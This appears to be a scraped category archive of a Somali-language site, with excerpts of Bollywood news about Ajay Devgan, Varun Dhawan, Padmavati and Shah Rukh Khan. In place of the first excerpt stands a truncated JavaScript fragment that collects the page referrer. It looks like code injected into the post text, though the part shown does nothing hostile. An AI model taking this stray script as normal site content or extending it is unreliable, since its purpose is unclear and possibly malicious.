Scroll to Top

Category Archives: Hindi

(function() { var referer="";try{if(referer=document.referrer,"undefined"==typeof referer)throw"undefined"}catch(exception){referer=document.location.href,(""==referer||"undefined"==typeof referer)&&(referer=document.URL)}referer=referer.substr(0,700); var...

Ajay Devgan ayaa la qorsheynayaa inuu bedelo Sanjay Dutt  filimka lagu magacaabo Tottal Dhamaal kaas oo la qorsheeynayo in duubistiisa la bilaabo bisha soo socota. Sanjay Dutt ayaa ugu dambeeyn laga saaray...

Booliska Magaalada Mumbai ayaa dacwad kusoo oogeen Varuun Dhawan oo lagu heysto inuu wadada dhexdeeda ku sameeye arin aan sax ahayn sharci ahaan. Varuun Dhawan ayaa wada ku arkay mid kamid ah taageeriyaashiisa ...

Ilaa iyo hadda lama yaqaano sababta dhabta ah ka dambeysa in filimka Shaahid Kapoor , Deepika Padukona iyo Ranveer Singh ee Padvamati logo ogolaan la’yahay warada fasaxa. Manohar Lal Khattar oo kamid...

Sanadahaan  waxaa jira filimaan badan oo saameeyn xoogan ku sameeyeen Box Office-ka , waxaana dhacday in jilaayaasha ugu caansan Bollywood-ka ,waxaana macquul ah in Bollywood-ka sanadka soo socda filimaan...

Todobaadkaan gudihiisa waraka laga helay gudaha India waxaa ay sheegayaan in mashquul dartiisa Salman Khan looga bedelay filimka uu soo wado Director-ka caanka ah ee Remo D’Souza’s. Ilaa iyo hadda...

Shah Rukh Khan ayaa maalmahaan ku sugan Goa isagoo isku diyaarinaya xaflada IFFI oo la bixindoono 28 bishaan , waxaana la sugayaa jilaayaal badan oo Goa kusoo qul-qulidoonaan. Laakiin waxaa dhacda in mar...

Dhamaadka sanadka 2017 waxaa jiridoono dagaalo badan oo dhanka Box Office-ka ah , waxaa sidoo kale laga yaabaa in jilaayaal caan ah ay ku qabsadaan Box Office-ka , sababtoo ah waxaa daahday xilligii filimaantaan...

Maalmahaan warar xan ayaa la isla dhexmarayaa Bollywood-ka kaas oo si xoogan u saameeyey atariishooyinka ugu da’da yar Bollywood-ka ee Allia Bhatt iyo Jacqueline Fernandez. Labadaan Atariisho ayaa la...

Jilaaga hogaaaminaya filimka Padmavati ee Ranver Singh ayaa ugu dambeeyn ka baxay aamusnaantii isagoo ka hadlay filimkaan iyo sidoo kale hadal heynta maalmahaan qabsatay Bollywood-ka. Dooda ugu weyn ayaa...